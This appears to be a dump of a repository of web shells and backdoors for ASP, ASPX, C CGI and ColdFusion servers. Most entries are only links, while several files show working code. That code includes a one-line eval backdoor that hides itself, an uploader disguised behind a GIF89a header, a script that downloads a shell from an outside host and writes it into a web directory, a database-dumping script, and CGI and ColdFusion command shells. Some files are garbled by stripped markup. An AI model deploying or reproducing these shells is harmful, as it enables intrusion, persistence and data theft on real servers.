https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/Aventis KlasVayv 1.0.asp


--------------------------------------------------------------------------------
/Asp/CmdAsp.asp:
--------------------------------------------------------------------------------
 1 | <++ CmdAsp.asp ++>
 2 | <%@ Language=VBScript %>
 3 | <%
 4 |                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 
 5 | 
 6 | %>
 7 | 
 8 | 
 9 | 
" method="POST">
10 | 
11 | 
12 | 

13 | 
14 | <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
15 | 

16 | <%
17 |                                                                                                                                                                                                                                       
18 | %>
19 | 
20 | 
21 | <-- CmdAsp.asp -->
22 | 


--------------------------------------------------------------------------------
/Asp/CyberSpy5.Asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/CyberSpy5.Asp


--------------------------------------------------------------------------------
/Asp/DJ团队.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/DJ团队.asp


--------------------------------------------------------------------------------
/Asp/ELMALISEKER Backd00r.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/ELMALISEKER Backd00r.asp


--------------------------------------------------------------------------------
/Asp/Expdoor.com ASP专用小马.asp:
--------------------------------------------------------------------------------
 1 | Expdoor.com ASP专用小马
 2 | 

 3 |   
该脚本仅供学习使用,请勿用于非法!如果发现威胁文件,请到www.Expdoor.com解除你的危险状况
 9 | 
10 | 
11 |   

12 |   

13 |   
18 |   
21 | 

22 | <%
23 | dim s
24 | if request("action")="set" then   
25 | Text=request("Text")              
26 | FileName=request("FileName")      
27 | set fs=server.CreateObject("Scripting.FileSystemObject")   '创建FSO组件
28 | set file=fs.OpenTextFile(server.MapPath(FileName),8,True)  '创建FileName指定的文件
29 | file.writeline Text                                        '把TEXT逐行写入到文件中,如果没有写
30 | 
31 | 权限,会造成操作失败
32 | file.close                                                 '关闭file
33 | set file=nothing                                           '释放
34 | set fs=nothing                                             '释放
35 | response.write ("")    '返回到客户端执行提示保存成功
36 | end if
37 | %>


--------------------------------------------------------------------------------
/Asp/I.N.F HACKING CENTER.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/I.N.F HACKING CENTER.asp


--------------------------------------------------------------------------------
/Asp/JspWebShell By 绝对零度.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/JspWebShell By 绝对零度.asp


--------------------------------------------------------------------------------
/Asp/KOA ASP类 WebShell扫描工具.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/KOA ASP类 WebShell扫描工具.asp


--------------------------------------------------------------------------------
/Asp/NTDaddy  v1.9.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/NTDaddy  v1.9.asp


--------------------------------------------------------------------------------
/Asp/PcAnywhere提权 Bin版本.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/PcAnywhere提权 Bin版本.asp


--------------------------------------------------------------------------------
/Asp/RHTOOLS 1.5 BETA(PVT) Edited By KingDefacer.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/RHTOOLS 1.5 BETA(PVT) Edited By KingDefacer.asp


--------------------------------------------------------------------------------
/Asp/RHTOOLS 1.5 BETA(PVT).asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/RHTOOLS 1.5 BETA(PVT).asp


--------------------------------------------------------------------------------
/Asp/RedHat Hacker.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/RedHat Hacker.asp


--------------------------------------------------------------------------------
/Asp/RedHat Hacker.asp明文版.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/RedHat Hacker.asp明文版.asp


--------------------------------------------------------------------------------
/Asp/Remote Explorer.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/Remote Explorer.asp


--------------------------------------------------------------------------------
/Asp/STHx 渗透小组专用 ASP小马.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/STHx 渗透小组专用 ASP小马.asp


--------------------------------------------------------------------------------
/Asp/Server Variables.asp:
--------------------------------------------------------------------------------
 1 | <%
 2 | Dim Vars
 3 | %>
 4 | 
 5 | 
 

 6 | 
 

 7 | 
A list of all server 
 8 |   variables :  

 9 | 


10 |   

11 | 

12 | 
13 |    
14 |     
17 |     
20 |   
21 |   <% For Each Vars In Request.ServerVariables %>
22 |    
23 |     
24 |     
25 |   
26 |   <% Next %>
27 | 
Server 
15 |         Variable Name

16 |       
Server 
18 |         Variable Value

19 |       
<%= Vars %><%= Request.ServerVariables(Vars) %> 

28 | 


--------------------------------------------------------------------------------
/Asp/TNTHK加密小马.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/TNTHK加密小马.asp


--------------------------------------------------------------------------------
/Asp/UnKnown 高级Vip防删收费版.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/UnKnown 高级Vip防删收费版.asp


--------------------------------------------------------------------------------
/Asp/Web Shell.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/Web Shell.asp


--------------------------------------------------------------------------------
/Asp/Welcome To AK Team.asp:
--------------------------------------------------------------------------------
 1 | GIF89a$       ;
 2 | <% if request("miemie")="av" then %>
 3 | <%
 4 | on error resume next
 5 | testfile=Request.form("2010")
 6 | if Trim(request("2010"))<>"" then
 7 | set fs=server.CreateObject("scripting.filesystemobject")
 8 | set thisfile=fs.CreateTextFile(testfile,True)
 9 | thisfile.Write(""&Request.form("1988") & "")
10 | if err =0 Then
11 | response.write"Success"
12 | else
13 | response.write"False"
14 | end if
15 | err.clear
16 | thisfile.close
17 | set fs = nothing
18 | End if
19 | %>
20 | 
33 | Welcome To AK Team
34 | 

35 | "> 

37 | 
38 | 
39 | 
- BY F4ck

40 | 

41 | <% end if %>
42 | 
43 | shell.asp?miemie=av


--------------------------------------------------------------------------------
/Asp/ZehirIV.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/ZehirIV.asp


--------------------------------------------------------------------------------
/Asp/asp wget drag database.asp:
--------------------------------------------------------------------------------
 1 | <%@LANGUAGE="VBSCRIPT" CODEPAGE="65001" %>'这里改编码方式
 2 | <%
 3 | '用法:如果把本程序放在[url]http://www.xxx.com/sql.asp[/url],可以wget [url]http://www.xxx.com/sql.asp[/url] -O x.csv 来直接拖库
 4 |         Response.Buffer = True
 5 |         Server.ScriptTimeout = 2147483647
 6 |  
 7 |         str="Driver={Sql Server};Server=192.168.1.5;Uid=mssql库名;Pwd=mssql密码;Database=库名" 这里是连接字符串
 8 |         Set Conn=Server.CreateObject("Adodb.connection")
 9 |         Conn.Open str
10 |  
11 |         Set Rs = Server.Createobject("Adodb.Recordset") 
12 |  
13 |         Sqlstr="SELECT  * FROM 库名.dbo.[表名]"  '这里是导哪个库哪个表的语句
14 |         Rs.Open Sqlstr,Conn,3,3 
15 |  
16 |         If(Rs.Fields.Count > 0)Then
17 |                 For I = 0 To Rs.Fields.Count - 1
18 |                         Response.Write Rs.Fields(i).Name & "        "
19 |                 Next
20 |                 Response.Write(vbNewLine)
21 |  
22 |                 For I = 1 To Rs.RecordCount
23 |                                          
24 |                         If(I Mod 100 = 0)Then
25 |                                 Response.Flush
26 |                         End If
27 |  
28 |                         For J = 0 To Rs.Fields.Count - 1
29 |                                 Response.Write Rs(J) & "        "
30 |                         Next
31 |  
32 |                         Response.Write(vbNewLine)
33 |                          
34 |                         Rs.MoveNext
35 |                 Next
36 |         End If
37 |  
38 |         Rs.Close 
39 |         Conn.Close
40 |         If(Err <> 0)Then Response.Write(Err.Description)
41 |         Set Rs = Nothing 
42 |         Set Conn = Nothing 
43 | %>


--------------------------------------------------------------------------------
/Asp/by EJDER.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/by EJDER.asp


--------------------------------------------------------------------------------
/Asp/bypass-iisuser-p.asp:
--------------------------------------------------------------------------------
1 | <%Eval(Request(chr(112))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if  f.attributes <> 39 then:f.attributes = 39:end if%>


--------------------------------------------------------------------------------
/Asp/download 下载文件.asp:
--------------------------------------------------------------------------------
 1 | <%
 2 | Set xPost = createObject("Microsoft.XMLHTTP")
 3 |  xPost.Open "GET","http://hack.com/shell.txt",0
 4 |  xPost.Send()
 5 |  Set sGet = createObject("ADODB.Stream")
 6 |  sGet.Mode = 3
 7 |  sGet.Type = 1
 8 |  sGet.Open()
 9 |  sGet.Write(xPost.responseBody)
10 |  sGet.SaveToFile "D:\website\jingsheng\Templates\heise\html\shell.asp",2  
11 |  %>


--------------------------------------------------------------------------------
/Asp/h4ck_Door.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/h4ck_Door.asp


--------------------------------------------------------------------------------
/Asp/hkmjj.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/hkmjj.asp


--------------------------------------------------------------------------------
/Asp/inDEXER And ReaDer.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/inDEXER And ReaDer.asp


--------------------------------------------------------------------------------
/Asp/list.cer:
--------------------------------------------------------------------------------
 1 | 
11 | 
12 | 
13 | 
14 | 
15 | <%
16 | 
17 | file=request("file")
18 | tipo=request("type")
19 | 
20 | If file="" then
21 | 	file="c:\"
22 | 	tipo="1"
23 | End If
24 | 
25 | %>
26 | 
27 | 
28 | 

29 | 
30 | 
31 | 
32 | 

33 | 
34 | 
35 | <%
36 | 
37 | If tipo="1" then
38 |     Response.Write("
PATH: " & file & "
")
39 | 	ListFolder(file)
40 | End If
41 | 
42 | If tipo="2" then
43 |     Response.Write("
FILE: " & file & "
")
44 | 
45 |     Set oStr = server.CreateObject("Scripting.FileSystemObject")
46 |     Set oFich = oStr.OpenTextFile(file, 1)
47 | 
48 | 	Response.Write("
--
")
49 | 
50 |     Response.Write(oFich.ReadAll)
51 | 
52 |     Response.Write("
--
")
53 | 
54 | End If
55 | %>
56 | 
57 | <%
58 | 
59 | sub ListFolder(path)
60 | 
61 | 	set fs = CreateObject("Scripting.FileSystemObject")
62 | 	set folder = fs.GetFolder(path)
63 | 
64 | 	Response.Write("
( ) " & ".." & "" & vbCrLf)
65 | 
66 | 	for each item in folder.SubFolders
67 | 		Response.Write("
( ) " & item.Name & "" & vbCrLf)
68 | 	next
69 | 
70 | 	for each item in folder.Files
71 | 		Response.Write("
  • " & item.Name & " - " & item.Size & " bytes, " & "
    • " & vbCrLf)
72 | 	next
73 | 
74 | end sub
75 | 
76 | %>
77 | 
78 | 
79 | 
80 | 


--------------------------------------------------------------------------------
/Asp/mssql.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/mssql.asp


--------------------------------------------------------------------------------
/Asp/r00ts小组过防火墙马.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/r00ts小组过防火墙马.asp


--------------------------------------------------------------------------------
/Asp/r00ts无FSO组建大马.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/r00ts无FSO组建大马.asp


--------------------------------------------------------------------------------
/Asp/radhat.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/radhat.asp


--------------------------------------------------------------------------------
/Asp/upfile_write.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/upfile_write.asp


--------------------------------------------------------------------------------
/Asp/upfile_write.rar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/upfile_write.rar


--------------------------------------------------------------------------------
/Asp/上传小马.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/上传小马.asp


--------------------------------------------------------------------------------
/Asp/不灭之魂.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/不灭之魂.asp


--------------------------------------------------------------------------------
/Asp/不灭之魂2013改进版本.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/不灭之魂2013改进版本.asp


--------------------------------------------------------------------------------
/Asp/传说中的hcker.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/传说中的hcker.asp


--------------------------------------------------------------------------------
/Asp/传说中的草泥马4.0.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/传说中的草泥马4.0.asp


--------------------------------------------------------------------------------
/Asp/修改属性.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/修改属性.asp


--------------------------------------------------------------------------------
/Asp/啊D小工具 - 目录读写检测 [ASP版].asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/啊D小工具 - 目录读写检测 [ASP版].asp


--------------------------------------------------------------------------------
/Asp/图片一句话/JFIF.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/图片一句话/JFIF.asp


--------------------------------------------------------------------------------
/Asp/图片一句话/gif87a.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/图片一句话/gif87a.jpg


--------------------------------------------------------------------------------
/Asp/图片一句话/gif89a.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/图片一句话/gif89a.asp


--------------------------------------------------------------------------------
/Asp/图片一句话/img.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/图片一句话/img.jpg


--------------------------------------------------------------------------------
/Asp/图片一句话/mima_abcd.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/图片一句话/mima_abcd.jpg


--------------------------------------------------------------------------------
/Asp/土司搞基asp大马.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/土司搞基asp大马.asp


--------------------------------------------------------------------------------
/Asp/在线数据库管理工具 1.5.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/在线数据库管理工具 1.5.asp


--------------------------------------------------------------------------------
/Asp/小强asp木马.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/小强asp木马.asp


--------------------------------------------------------------------------------
/Asp/小红帽.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/小红帽.asp


--------------------------------------------------------------------------------
/Asp/很好用的扫可读可写目录asp脚本xwdir.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/很好用的扫可读可写目录asp脚本xwdir.asp


--------------------------------------------------------------------------------
/Asp/旁注 - 网站小助手.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/旁注 - 网站小助手.asp


--------------------------------------------------------------------------------
/Asp/星外-华众-新网-虚拟主机提权专用Webshell.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/星外-华众-新网-虚拟主机提权专用Webshell.asp


--------------------------------------------------------------------------------
/Asp/木马帮V1.1-火舌版.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/木马帮V1.1-火舌版.asp


--------------------------------------------------------------------------------
/Asp/法克僵尸大马.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/法克僵尸大马.asp


--------------------------------------------------------------------------------
/Asp/海阳顶端网ASP木马@2006PLUS - By Marcos.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/海阳顶端网ASP木马@2006PLUS - By Marcos.asp


--------------------------------------------------------------------------------
/Asp/火狐NEW WebShell.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/火狐NEW WebShell.asp


--------------------------------------------------------------------------------
/Asp/炽天使.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/炽天使.asp


--------------------------------------------------------------------------------
/Asp/牛逼免杀提权隐藏大马.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/牛逼免杀提权隐藏大马.asp


--------------------------------------------------------------------------------
/Asp/目录扫描.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/目录扫描.asp


--------------------------------------------------------------------------------
/Asp/目录扫描读写马.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/目录扫描读写马.asp


--------------------------------------------------------------------------------
/Asp/红狼ASP木马--Anfly免杀版.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/红狼ASP木马--Anfly免杀版.asp


--------------------------------------------------------------------------------
/Asp/草莓webshell.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/草莓webshell.asp


--------------------------------------------------------------------------------
/Asp/虚拟主机提权专用Webshell去后门版.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/虚拟主机提权专用Webshell去后门版.asp


--------------------------------------------------------------------------------
/Asp/虚拟机主机提权大马.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/虚拟机主机提权大马.asp


--------------------------------------------------------------------------------
/Asp/银河舰队大马_2014版.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/银河舰队大马_2014版.asp


--------------------------------------------------------------------------------
/Asp/银河舰队大马_2015专版asp大马.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/银河舰队大马_2015专版asp大马.asp


--------------------------------------------------------------------------------
/Aspx/ASPX one line Code Client by amxku.aspx:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |  ASPX one line Code Client by amxku
 5 | 
 6 | 
 7 | 
    
 8 | 
13 | 

    
14 | 
15 | 
16 | 
17 | 


--------------------------------------------------------------------------------
/Aspx/ASPX小马 - 黑兵社团.aspx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Aspx/ASPX小马 - 黑兵社团.aspx


--------------------------------------------------------------------------------
/Aspx/Code by Bin.aspx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Aspx/Code by Bin.aspx


--------------------------------------------------------------------------------
/Aspx/MYSQL Manager -Asp.net Silic Group Hacker Army专用版本.aspx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Aspx/MYSQL Manager -Asp.net Silic Group Hacker Army专用版本.aspx


--------------------------------------------------------------------------------
/Aspx/WebAdmin 2.X Final.aspx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Aspx/WebAdmin 2.X Final.aspx


--------------------------------------------------------------------------------
/Aspx/WebSniff 1.0  Powered by  C.C.T.aspx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Aspx/WebSniff 1.0  Powered by  C.C.T.aspx


--------------------------------------------------------------------------------
/Aspx/awen asp.net webshell.aspx:
--------------------------------------------------------------------------------
 1 | <%@ Page Language="C#" Debug="true" Trace="false" %>
 2 | <%@ Import Namespace="System.Diagnostics" %>
 3 | <%@ Import Namespace="System.IO" %>
 4 | 
28 | 
29 | 
30 | awen asp.net webshell
31 | 
32 | 
33 | 
34 | 
35 | 
36 | Command:
37 | 
38 | 
39 | 
40 | 
41 | 
42 | 
43 | 


--------------------------------------------------------------------------------
/Aspx/view.aspx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Aspx/view.aspx


--------------------------------------------------------------------------------
/Aspx/z8VSmO1418105414843.jpg:
--------------------------------------------------------------------------------
1 | ERROR:// 对象关闭时,不允许操作。


--------------------------------------------------------------------------------
/Aspx/上传马.aspx:
--------------------------------------------------------------------------------
 1 | <%@ Page Language="VB" %>
 2 | <%@ import Namespace="System.IO" %>
 3 | 
10 | 


--------------------------------------------------------------------------------
/Aspx/凝聚科技专用AspX大马 Bysunue.aspx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Aspx/凝聚科技专用AspX大马 Bysunue.aspx


--------------------------------------------------------------------------------
/Aspx/国外牛逼大马.aspx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Aspx/国外牛逼大马.aspx


--------------------------------------------------------------------------------
/C/cmd.c:
--------------------------------------------------------------------------------
 1 | //
 2 | // cmdcgi.exe 0.1 darkraver (12/05/2005)
 3 | //
 4 | 
 5 | #include 
 6 | 
 7 | 
 8 | char *uri_decode(char *uri) {
 9 |   int i=0;
10 |   int ptr=0;
11 |   char *command;
12 |   char hexa[3];
13 |   char code;
14 | 
15 |   command=(char *)malloc(strlen(uri));
16 | 
17 |   for(i=0;i\n");
53 | 
54 |   cmd=(char *)getenv("QUERY_STRING");
55 | 
56 |   if(!cmd || strlen(cmd)==0) {
57 |     printf("
    ");
58 |     printf("");
59 |     printf("");
60 |     printf("

    ");
61 |     } else {
62 |     //printf("QUERY_STRING: %s\n", cmd);
63 |     cmd+=4;
64 |     cmd=uri_decode(cmd);
65 |     printf("
    COMMAND: %s

    \n", cmd);
66 |     fflush(stdout);
67 |     execl("/bin/sh", "/bin/sh", "-c", cmd, 0);
68 |     }
69 | 
70 | }
71 | 
72 | 
73 | 
74 | 
75 | 


--------------------------------------------------------------------------------
/Cfm/ColdFusion.chm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Cfm/ColdFusion.chm


--------------------------------------------------------------------------------
/Cfm/cfSQL.cfm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 | 
 5 | 
 6 | 
 7 | 
 8 | 
 9 | 
    Notes:
    
10 | 
      
11 | 
    • Select the database you want to use
      • 
12 | 
    • Write SQL statements in the text box
      • 
13 | 
    
14 | 
15 | 
    
16 | 
    SQL Interface:
    
17 | Datasource
    
18 | 
27 | 
28 | 
    
29 | SQL
    
30 | 
31 | 
    
32 | 
33 | 
    
34 | 
35 | 
36 | 
37 | 	#Form.sql#
38 | 
39 | 
40 | 
41 | 
42 |     
43 |     
44 |         
45 |                 
46 |                         
47 |                                   
48 |                         
49 |                 
50 |         
51 |                 
52 |                         
53 |                                 
54 |                         
55 |                 
56 |         
57 |     
58 |     
59 | 
    #column#
    #runsql[column][row]#
    
60 | 
61 | 
62 | 
63 | 
64 | 


--------------------------------------------------------------------------------
/Cfm/cfexec.cfm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 | 
 5 | 
 6 | Notes:

    
 7 | 
      
 8 | 
    • Prefix DOS commands with "c:\windows\system32\cmd.exe /c <command>" or wherever cmd.exe is
      
 9 | 
    • Options are, of course, the command line options you want to run
10 | 
    • CFEXECUTE could be removed by the admin. If you have access to CFIDE/administrator you can re-enable it
11 | 
    
12 | 
    
13 | 
14 | 
15 | 
16 | 
18 | 
20 | 
23 | 
    Command:value="#form.cmd#">
    Options: value="#form.opts#">
    Timeout: value="#form.timeout#"
22 |   value="5">
    
24 | 
25 | 
26 | 
27 | 
28 | 
29 | 
32 | 
33 | 
34 | 
    35 | #myVar#
36 | 
    
37 | 
38 | 
39 | 
40 | 
41 | 
42 | 
43 | 
44 | 


--------------------------------------------------------------------------------
/Cfm/cfmShell.cfm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 | 
 5 | CFM shell
 6 | 
 7 | 
 8 | 
 9 | 
10 |     #cmd#
11 |     
15 |     
16 | 
17 | 
    
18 | 
19 | 
20 | 
    
21 | 
22 |   
25 | 
28 |     
30 | 
31 | 
32 | 
33 | 


--------------------------------------------------------------------------------
/Cfm/cmd.cfm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 | 
 5 | 
 6 | 
 7 |  
 8 |   
 9 |   
10 |  
11 |  
12 |   
13 |   
14 |  
15 |  
16 |   
17 |   
18 |  
19 | 
    Command: < input type=text name="cmd" size=50 value="#form.cmd#" > < br>
    Options: < input type=text name="opts" size=50  value="#form.opts#"  >< br> 
    Timeout:< input type=text name="timeout" size=4  value="#form.timeout#"  value="5"  > 
    
20 | 
21 | 
22 | 
23 | 
24 | 
25 | 
26 | 
